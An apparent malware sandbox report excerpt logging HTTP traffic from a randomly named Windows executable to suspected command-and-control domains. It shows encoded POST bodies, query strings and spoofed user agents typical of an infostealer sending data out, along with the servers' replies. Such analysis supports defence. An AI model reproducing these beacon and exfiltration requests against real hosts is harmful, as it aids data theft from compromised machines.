                                                                Data Raw: 31 33 35 31 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a e9 92 e2 4a 76 fe 7f 9f 02 97 c3 f6 4c a8 ab b5 02 a2 a6 aa 67 b4 21 09 90 90 04 02 84 c3 71 43 bb 84 56 b4 c3 84 1f c8 af e1 27 73 8a aa ea a2 e8 aa db 3d 0e ff 70 f6 8f 42 b9 9c 3c cb 77 ce c9 ce 93 bf fd f6 db e3 3f b1 4b 66 6d 28 dc 20 a8 92 f8 db 6f 8f cf 7f 06 a0 3d 06 ae e9 7c fb ed f2 33 71 2b 13 cc a8 f2 7b f7 58 87 cd d3 1d 93 a5 95 9b 56 f7 d5 29 77 ef 06 f6 f3 d7 d3 5d e5 76 15 dc 93 f8 cb c0 0e cc a2 74 ab a7 ba f2 ee c9 bb 4f e9 98 76 e0 de f7 eb 8b 2c be 22 94 66 f7 76 3f f4 e9 42 a5 30 fd c4 fc 47 56 70 5d 1e 16 6e 79 b5 04 79 47 3d 35 13 f7 e9 ae 09 dd 36 cf 8a ea 6a 5a 1b 3a 55 f0 e4 b8 4d 68 bb f7 97 8f 2f 83 30 0d ab d0 8c ef 4b db 8c dd 27 f4 eb 77 52 55 58 c5 ee 37 02 21 06 72 56 0d a6 59 9d 3a 8f f0 73 e7 b3 2a cb ea 14 bb 83 5e 6f 2f ea b2 cb f2 85 8f 5e d5 56 e6 9c 06 7f bf 4c ed 3f fb e6 01 ed dc 7b 66 12 c6 a7 87 01 55 80 6d bf 0c 04 37 6e dc 2a b4 cd 2f 83 d2 4c cb fb d2 2d 42 ef 2f 3f 2e 2b c3 b3 fb 30 40 89 bc 7b 3f [TRUNCATED]
                                                                Data Ascii: 1351ZJvLg!qCV's=pB<w?Kfm( o=|3q+{XV)w]vtOv,"fv?B0GVp]nyyG=56jZ:UMh/0K'wRUX7!rVY:s*^o/^VL?{fUm7n*/L-B/?.+0@{?{T`+1J`,(?{~61y??1?LuwK,D*yl]XqfG}g}z@Kf]e7{._",-0A_\WXqo_Pl!.\c=$?3gE/-"!=z`@]Wh-5@yFgj]IyPN>!Io<?=n*Ko:;j}vV Eoqhd[\=^f&32Q#b2zcQ>2/ol?yqXV>uY]!!_u&-)o>2bi3}`dmyG;].Q>P|}m_QmV8HrT~I*@W KYxSz125?VPtYCzug|J
                                                                Dec 9, 2024 08:43:41.623619080 CET1236INData Raw: a0 04 fe 66 86 37 7e fe 96 b8 4e 68 0e fe 94 80 40 fa 62 98 f1 88 cc bb 3f df 6c 73 8b da 9b e1 5e 79 79 56 5e 32 d4 c3 a0 70 63 10 eb 9a 1b 07 ec e7 f4 11 0b f8 4f fb 30 08 42 c7 71 d3 37 96 fa d1 be 5d e5 a7 0b b2 9f fd fa fd bc 37 f6 fb 15 b7
                                                                Data Ascii: f7~Nh@b?ls^yyV^2pcO0Bq7]7}E(CI?8T^4=u/"]G}~=q<^z?4GLRb ,d^s"g^a0oeZero>z9
                                                                Dec 9, 2024 08:43:41.623631001 CET1236INData Raw: e1 b2 c4 27 0b 58 34 da 70 d9 69 82 ef 72 73 3b b1 24 71 62 db 82 c6 38 9d ee 1a 66 3a cd d5 99 44 eb ac 38 ed 5a d4 0e 66 21 4d 65 49 74 c6 3b 02 8f a1 b4 de f2 c9 36 88 d4 12 31 47 c6 d8 10 36 ee 78 8c 25 68 b5 8f 75 9a 0b e6 e2 24 1a a5 f5 82
                                                                Data Ascii: 'X4pirs;$qb8f:D8Zf!MeIt;61G6x%hu$#|NpTqf76[J9^sNdK[(t&A\'a GXfSfQ*sam.!4_&;pBM=:rRy%9\[(n.ZAX-
                                                                Dec 9, 2024 08:43:41.624157906 CET672INData Raw: 6d 08 e0 d4 0a dd b4 e7 e3 32 ae d7 4d c0 d2 1b 1a 33 09 f1 d4 c1 84 de 2d 8a 8e f4 b3 93 bd 45 74 ce 5f 12 27 6c 81 0b 90 1e 0f 77 22 4c 34 99 3d 2a f6 11 85 d3 79 83 a7 07 6f 05 a7 81 36 26 51 10 9a e5 51 45 2c dd 6d a7 76 75 94 fa f5 0c 5d 91
                                                                Data Ascii: m2M3-Et_'lw"L4=*yo6&QQE,mvu]iR*1>[$3L#$Sh=rirW:37,*27t1=fa(7k^'rAsoFT2;i|2r.eHQb;q-neJ'q
                                                                Dec 9, 2024 08:43:41.624175072 CET857INData Raw: 45 cb f4 78 1b 51 16 89 46 67 d2 e3 b2 a1 6c 22 05 a5 1a 3a 39 57 b9 2d c8 7d 11 65 9a 5e aa 29 e1 8e e3 05 85 61 2c 3b ed f2 40 e4 14 25 0d 76 f6 64 17 69 72 2d 04 38 d3 92 b3 5d e5 ba cc 66 bc 3f f8 70 5b 9b a4 c1 c7 f8 ae 61 75 e5 04 db 30 d5
                                                                Data Ascii: ExQFgl":9W-}e^)a,;@%vdir-8]f?p[au08jLzCf?=ne?z;+=~+Z7ZKE|?w>:a3c,X^/s@=T^+L}'_/=;?.


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                4192.168.2.1249732162.0.215.33801344C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exe
                                                                TimestampBytes transferredDirectionData
                                                                Dec 9, 2024 08:43:43.110004902 CET541OUTGET /30le/?Ebfx6=jHE7b6Z9ED1A0Je7bwo+kjGjstTykwGZjMkqHVfcjQ95lgOzDj3OOkgun9YTkzFADI0DOvoxgj3LN5jGlHy+CHSERU+xtauim+BahOPB0GJcVol5yfYldYk=&Njld=LDTtwxbX2vi0G HTTP/1.1
                                                                Host: www.nieuws-july202488.sbs
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-us
                                                                Connection: close
                                                                User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                Dec 9, 2024 08:43:44.378421068 CET1236INHTTP/1.1 404 Not Found
                                                                keep-alive: timeout=5, max=100
                                                                content-type: text/html
                                                                transfer-encoding: chunked
                                                                date: Mon, 09 Dec 2024 07:43:44 GMT
                                                                server: LiteSpeed
                                                                x-turbo-charged-by: LiteSpeed
                                                                connection: close
                                                                Data Raw: 32 37 38 44 0d 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 [TRUNCATED]
                                                                Data Ascii: 278D<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>404 Not Found</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; [TRUNCATED]
                                                                Dec 9, 2024 08:43:44.378458977 CET1236INData Raw: 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 35 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63
                                                                Data Ascii: } .status-reason { font-size: 250%; display: block; } .contact-info, .reason-text { color: #000000; } .additional-info { background-repeat: no-rep
                                                                Dec 9, 2024 08:43:44.378472090 CET1236INData Raw: 2d 69 6d 61 67 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20
                                                                Data Ascii: -image { padding: 10px; } .info-heading { font-weight: bold; text-align: left; word-break: break-all; width: 100%; } .info-server address {
                                                                Dec 9, 2024 08:43:44.378880024 CET672INData Raw: 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 38 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 69 6d 61 67 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                Data Ascii: font-size: 18px; } .info-image { float: left; } .info-heading { margin: 62px 0 0 98px; } .info-server address { te
                                                                Dec 9, 2024 08:43:44.378894091 CET1236INData Raw: 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f
                                                                Data Ascii: //////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////5+fn////////////////////////////////6+vr///////////////////////////////////////+i5edTAAAA
                                                                Dec 9, 2024 08:43:44.378907919 CET1236INData Raw: 53 72 41 55 30 69 46 59 4c 72 48 55 32 52 4b 42 33 71 2b 48 78 44 48 54 34 4a 4b 45 65 32 70 72 68 78 59 31 61 43 53 35 6c 59 2b 48 6e 58 75 36 4e 2b 78 36 49 4a 43 52 51 51 6d 45 45 7a 2b 59 6a 49 45 2f 78 73 2f 4d 6d 44 38 71 48 52 59 4b 35 43
                                                                Data Ascii: SrAU0iFYLrHU2RKB3q+HxDHT4JKEe2prhxY1aCS5lY+HnXu6N+x6IJCRQQmEEz+YjIE/xs/MmD8qHRYK5CAHuaTY5jfQxFC/YoIQSSVafrD+WK4H0Piv8SATRZChEXiOs39L/IYwiOxRHgeEKcmbMI9ccHRCdxUeYanFpQJMBUDIFxw1chJiBAomkz3x43l+nuWGmWhkQs0a6Y7YHVe772m1tZlUBEhKI9k6nuLE8bzKVSECEHe
                                                                Dec 9, 2024 08:43:44.378920078 CET1236INData Raw: 34 58 68 38 4e 51 4d 2f 64 5a 4d 78 56 4b 44 6b 50 43 79 57 6d 62 50 4a 2f 38 75 49 51 4a 2f 58 62 69 4c 38 62 4e 4b 76 76 30 76 57 6c 4c 43 62 30 66 51 6a 52 39 7a 75 55 31 79 2b 73 53 6b 6a 63 71 73 67 50 41 7a 43 56 47 46 57 7a 50 70 59 78 4a
                                                                Data Ascii: 4Xh8NQM/dZMxVKDkPCyWmbPJ/8uIQJ/XbiL8bNKvv0vWlLCb0fQjR9zuU1y+sSkjcqsgPAzCVGFWzPpYxJM9GAMXhGRinD85xkrCxEomEY7I7j/40IEvjWlJ7wDzjJZtmbCW/cChOPPtlICMGXIAX3QFYQIRcI3Cq2ZNk3tYduunPxIpus8JoLi5e1u2yWN1kxd3UV9VXAdvnjntIksh1V3BSe/DIUIHBdRCMMV6OnHrtW3bxc8
                                                                Dec 9, 2024 08:43:44.379856110 CET1236INData Raw: 59 6d 67 2b 51 4e 4e 4f 77 33 50 64 43 4c 67 70 42 55 52 4f 50 51 31 38 6d 58 31 5a 45 78 38 70 39 2f 2f 49 69 30 71 63 33 51 69 36 43 6d 41 55 31 64 45 70 44 39 53 41 31 74 54 39 38 2f 47 5a 61 64 76 66 32 39 47 78 50 59 50 68 39 6e 2b 4d 6a 41
                                                                Data Ascii: Ymg+QNNOw3PdCLgpBUROPQ18mX1ZEx8p9//Ii0qc3Qi6CmAU1dEpD9SA1tT98/GZadvf29GxPYPh9n+MjAuRNg/Hc4WYm8WjT0pABNB7WkAb81kz8fEo5Na0rAQYU8KQEWEPSkAaafnRPiXEGHPCCbcnxphIEPPnhXc9XkRNuHh3Cw8JXteeCV7Zjg/wua8YGl3XvDUPy/c/Avd4/hNDSqegQAAAABJRU5ErkJggg==);
                                                                Dec 9, 2024 08:43:44.379875898 CET1031INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 2d 69 74 65 6d 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 75 6c 3e 0a 20 20 20 20 20 20 20 20 20
                                                                Data Ascii: <div class="additional-info-items"> <ul> <li> <img src="/img-sys/server_misconfigured.png" class="info-image" /> <div class="info-h


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                5192.168.2.1249733104.18.73.116801344C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exe
                                                                TimestampBytes transferredDirectionData
                                                                Dec 9, 2024 08:43:50.020735979 CET793OUTPOST /s15n/ HTTP/1.1
                                                                Host: www.losmason.shop
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-us
                                                                Accept-Encoding: gzip, deflate
                                                                Connection: close
                                                                Content-Length: 202
                                                                Cache-Control: max-age=0
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Origin: http://www.losmason.shop
                                                                Referer: http://www.losmason.shop/s15n/
                                                                User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                Data Raw: 45 62 66 78 36 3d 45 64 34 70 70 51 73 4d 6e 35 54 79 2b 42 36 6f 4a 68 77 38 38 37 47 6c 66 2b 48 4c 2b 4c 6f 73 37 75 4c 7a 79 33 36 54 56 39 47 31 5a 77 58 42 4c 37 47 2b 57 65 6c 77 6f 46 30 43 4f 52 6d 62 33 31 62 42 31 78 44 6a 55 78 55 48 75 4d 4f 47 6f 53 38 6e 33 41 64 44 75 4e 35 45 56 49 2f 62 47 5a 6c 58 32 6f 73 49 33 43 55 37 43 5a 76 38 74 38 34 33 59 65 62 4c 30 79 67 75 52 67 6d 32 4c 52 47 70 49 6f 65 42 4e 6c 6f 78 67 31 68 54 4c 64 6e 77 4c 58 68 4a 62 76 77 6c 2b 68 55 53 47 56 6c 61 2f 4e 46 51 43 2b 74 32 61 53 35 59 76 4f 44 47 31 44 6c 73 63 48 56 63 6d 79 68 55 4d 41 3d 3d
                                                                Data Ascii: Ebfx6=Ed4ppQsMn5Ty+B6oJhw887Glf+HL+Los7uLzy36TV9G1ZwXBL7G+WelwoF0CORmb31bB1xDjUxUHuMOGoS8n3AdDuN5EVI/bGZlX2osI3CU7CZv8t843YebL0yguRgm2LRGpIoeBNloxg1hTLdnwLXhJbvwl+hUSGVla/NFQC+t2aS5YvODG1DlscHVcmyhUMA==
                                                                Dec 9, 2024 08:43:51.260341883 CET565INHTTP/1.1 301 Moved Permanently
                                                                Date: Mon, 09 Dec 2024 07:43:51 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Location: https://www.losmason.shop/s15n/
                                                                CF-Cache-Status: DYNAMIC
                                                                Set-Cookie: __cf_bm=s0sfLYXLv2h7ef9CIb_9VvPNSf77t2.chae0JXU66wA-1733730231-1.0.1.1-42UMcDuzBSitGCj0naEK24QMiRve5iCqBfk.DBfaE5Ld7_XF2jqLJrw.8LnqmYJONtLs3bCQBcUankVdFUzxkg; path=/; expires=Mon, 09-Dec-24 08:13:51 GMT; domain=.www.losmason.shop; HttpOnly
                                                                Server: cloudflare
                                                                CF-RAY: 8ef35dd75c14c46b-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                6192.168.2.1249734104.18.73.116801344C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exe
                                                                TimestampBytes transferredDirectionData
                                                                Dec 9, 2024 08:43:52.676666021 CET813OUTPOST /s15n/ HTTP/1.1
                                                                Host: www.losmason.shop
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-us
                                                                Accept-Encoding: gzip, deflate
                                                                Connection: close
                                                                Content-Length: 222
                                                                Cache-Control: max-age=0
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Origin: http://www.losmason.shop
                                                                Referer: http://www.losmason.shop/s15n/
                                                                User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                Data Raw: 45 62 66 78 36 3d 45 64 34 70 70 51 73 4d 6e 35 54 79 2f 68 71 6f 61 51 77 38 74 4c 47 6b 43 4f 48 4c 6e 62 6f 6f 37 75 50 7a 79 32 2f 57 57 50 53 31 41 53 50 42 49 2f 79 2b 59 2b 6c 77 38 56 30 39 4b 52 6d 41 33 31 58 6a 31 77 2f 6a 55 78 51 48 75 4a 79 47 6f 68 45 67 32 51 64 4e 68 74 35 47 61 6f 2f 62 47 5a 6c 58 32 6f 34 69 33 43 4d 37 43 71 48 38 73 64 34 30 62 65 62 45 7a 79 67 75 62 41 6d 79 4c 52 47 62 49 70 79 37 4e 6a 30 78 67 77 6c 54 4c 49 54 7a 43 58 68 54 44 50 78 79 2f 78 78 68 43 79 46 68 68 2b 39 2b 63 39 42 70 57 30 30 43 77 38 4c 51 67 41 78 68 52 51 73 73 72 78 63 64 58 4b 31 48 63 4c 36 53 32 39 48 76 50 4a 74 62 4d 4c 53 36 32 67 45 3d
                                                                Data Ascii: Ebfx6=Ed4ppQsMn5Ty/hqoaQw8tLGkCOHLnboo7uPzy2/WWPS1ASPBI/y+Y+lw8V09KRmA31Xj1w/jUxQHuJyGohEg2QdNht5Gao/bGZlX2o4i3CM7CqH8sd40bebEzygubAmyLRGbIpy7Nj0xgwlTLITzCXhTDPxy/xxhCyFhh+9+c9BpW00Cw8LQgAxhRQssrxcdXK1HcL6S29HvPJtbMLS62gE=
                                                                Dec 9, 2024 08:43:53.844738960 CET565INHTTP/1.1 301 Moved Permanently
                                                                Date: Mon, 09 Dec 2024 07:43:53 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Location: https://www.losmason.shop/s15n/
                                                                CF-Cache-Status: DYNAMIC
                                                                Set-Cookie: __cf_bm=nA4vHz_Uk0GEYvi8kS7w50e7gH0nB2nRL.HJOsMmk1M-1733730233-1.0.1.1-Ey12tydLM.b3kphK1yilenufdURNF6FRrW08hlQ.9Sv1VfT_Kt4LR4SzRhw1r0axGiRIvomTOPDXKPDzyMyepA; path=/; expires=Mon, 09-Dec-24 08:13:53 GMT; domain=.www.losmason.shop; HttpOnly
                                                                Server: cloudflare
                                                                CF-RAY: 8ef35de7fc9241b5-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                7192.168.2.1249735104.18.73.116801344C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exe
                                                                TimestampBytes transferredDirectionData
                                                                Dec 9, 2024 08:43:55.335932970 CET1826OUTPOST /s15n/ HTTP/1.1
                                                                Host: www.losmason.shop
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-us
                                                                Accept-Encoding: gzip, deflate
                                                                Connection: close
                                                                Content-Length: 1234
                                                                Cache-Control: max-age=0
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Origin: http://www.losmason.shop
                                                                Referer: http://www.losmason.shop/s15n/
                                                                User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                Data Raw: 45 62 66 78 36 3d 45 64 34 70 70 51 73 4d 6e 35 54 79 2f 68 71 6f 61 51 77 38 74 4c 47 6b 43 4f 48 4c 6e 62 6f 6f 37 75 50 7a 79 32 2f 57 57 50 71 31 63 33 62 42 4c 65 79 2b 5a 2b 6c 77 6a 6c 30 38 4b 52 6e 43 33 31 66 6e 31 77 7a 56 55 79 34 48 68 4c 4b 47 71 51 45 67 76 41 64 4e 6a 74 35 46 56 49 2f 4b 47 5a 31 54 32 6f 6f 69 33 43 4d 37 43 73 37 38 38 38 34 30 55 2b 62 4c 30 79 67 79 52 67 6e 56 4c 52 65 68 49 70 32 72 4b 56 45 78 67 51 31 54 59 75 50 7a 44 33 68 56 57 50 78 36 2f 78 4e 2b 43 7a 73 50 68 2f 4a 55 63 2b 68 70 48 51 31 43 73 2f 44 32 79 77 74 53 52 78 67 65 75 47 38 66 66 62 35 50 51 49 57 4a 39 4f 6a 70 44 4b 45 38 55 2b 47 42 31 31 4a 32 34 48 73 73 57 52 2b 35 65 4f 36 56 64 2f 4c 50 34 76 61 43 34 4c 45 53 77 44 43 6a 50 59 47 39 55 50 4a 51 69 45 63 69 35 72 30 45 36 38 43 57 43 6f 6d 4b 37 33 2b 74 39 45 2b 71 79 51 4e 30 67 47 46 57 42 51 6f 2b 4e 49 32 46 4f 34 2b 64 69 54 62 59 66 38 57 6b 39 72 56 58 59 5a 46 36 71 6f 7a 71 61 50 67 6a 38 78 47 71 41 53 71 61 54 49 73 70 [TRUNCATED]
                                                                Data Ascii: Ebfx6=Ed4ppQsMn5Ty/hqoaQw8tLGkCOHLnboo7uPzy2/WWPq1c3bBLey+Z+lwjl08KRnC31fn1wzVUy4HhLKGqQEgvAdNjt5FVI/KGZ1T2ooi3CM7Cs788840U+bL0ygyRgnVLRehIp2rKVExgQ1TYuPzD3hVWPx6/xN+CzsPh/JUc+hpHQ1Cs/D2ywtSRxgeuG8ffb5PQIWJ9OjpDKE8U+GB11J24HssWR+5eO6Vd/LP4vaC4LESwDCjPYG9UPJQiEci5r0E68CWComK73+t9E+qyQN0gGFWBQo+NI2FO4+diTbYf8Wk9rVXYZF6qozqaPgj8xGqASqaTIsppoMIBQU++e/IOweSFd9PYfFSE2VMDS+dk5jCPqjHKdWmcbuU/mECGmKBv8ZmjqRFcKVnuBsajrhvn1V69gH936ISTIZ1ScTE1VaSC+ru6fiUFRSZgDa7Qoc7sU0dvY7KbKvHwYLN30/U05fNka4IGE/XBe9BCoAsQ8EzpbMchNePNde00b3gnnCKtBIbnEvOki6rZJKBk2M6Fw1h4xZkfGZyqxa8DytLv7tDo8v7wZu0Y2tVT2AxJrrBy83DXqbpEWVeup5amDn8exFZS36cJXVAq3MLN6D4d7WeK+yw0i08Vc8wpm97p1D1P5Oa+WTfed2qOL8KcZPkerSbpzBkZFdmMIsSLix36vksJZdTMr7mqts5E1130L1y3r+1rZFtZL3DHSHURud9UTO5/hmKb2Oi4l/qh9cwniaWz3RV7y+/1a+PjFgBUqCRzUONcqkqgkO3hWEVl/aOTp19WR1F80Ehy36BsFQOpffSRrcGMxtelQzErql65pd5Mf/PYNu5mfyWK0OxYbZRtGq8w3Dt4YCFXM+7ZrgRGpM61WZIlLuSnxBu+ssiHiao6dqJfGsmq1DtDBFtOPhU5NaZj6ZAp6xCC3HYaLzlFlc3HtxmwzptwMH6D5q4jVYgS1PpbRemen2bl4fP+fALsnaM5xfg9S6iP8ku2vevYx [TRUNCATED]
                                                                Dec 9, 2024 08:43:56.559647083 CET565INHTTP/1.1 301 Moved Permanently
                                                                Date: Mon, 09 Dec 2024 07:43:56 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Location: https://www.losmason.shop/s15n/
                                                                CF-Cache-Status: DYNAMIC
                                                                Set-Cookie: __cf_bm=3YSkoRkzecJHVomqvOk3qdxVAp42YNAJVuB3pFD1L7w-1733730236-1.0.1.1-dKHjXcl8.Vxi3VCWIlCLA9vVZuyVROJ4OvOsKMC3IFb1qxh_nyEkYvVNvAoy0Yoz_LlILO3gb3yVQjwFLeZMJQ; path=/; expires=Mon, 09-Dec-24 08:13:56 GMT; domain=.www.losmason.shop; HttpOnly
                                                                Server: cloudflare
                                                                CF-RAY: 8ef35df8ef2543d3-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                8192.168.2.1249737104.18.73.116801344C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exe
                                                                TimestampBytes transferredDirectionData
                                                                Dec 9, 2024 08:43:58.000411987 CET533OUTGET /s15n/?Njld=LDTtwxbX2vi0G&Ebfx6=JfQJqlQL4YuujxfZFicS9Y3zSvzh5uc29LPY+3nQdNuELRDWQb2uefNArAI9Jzm+wUv6iBr2b0gwhreB6wQHxTYP3OopepfoLIsZrpge9AZLN4C6qP0OMt8= HTTP/1.1
                                                                Host: www.losmason.shop
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-us
                                                                Connection: close
                                                                User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                Dec 9, 2024 08:43:59.185503960 CET711INHTTP/1.1 301 Moved Permanently
                                                                Date: Mon, 09 Dec 2024 07:43:59 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Location: https://www.losmason.shop/s15n/?Njld=LDTtwxbX2vi0G&Ebfx6=JfQJqlQL4YuujxfZFicS9Y3zSvzh5uc29LPY+3nQdNuELRDWQb2uefNArAI9Jzm+wUv6iBr2b0gwhreB6wQHxTYP3OopepfoLIsZrpge9AZLN4C6qP0OMt8=
                                                                CF-Cache-Status: DYNAMIC
                                                                Set-Cookie: __cf_bm=KGkQyRtkEwg1G0Cg8gQUn93TZ7.NcjLFHgXjCv6IAEw-1733730239-1.0.1.1-BC3uWExy2wgIwbGGeuIRiYAsxH7pL53oXyhJJr8CSKn52LaETaOSggqJ509Rb23QmDQy4BWVB8sRMnAYLIvn8g; path=/; expires=Mon, 09-Dec-24 08:13:59 GMT; domain=.www.losmason.shop; HttpOnly
                                                                Server: cloudflare
                                                                CF-RAY: 8ef35e095aa441bb-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                9192.168.2.1249738192.185.147.100801344C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exe
                                                                TimestampBytes transferredDirectionData
                                                                Dec 9, 2024 08:44:05.425795078 CET790OUTPOST /yf1h/ HTTP/1.1
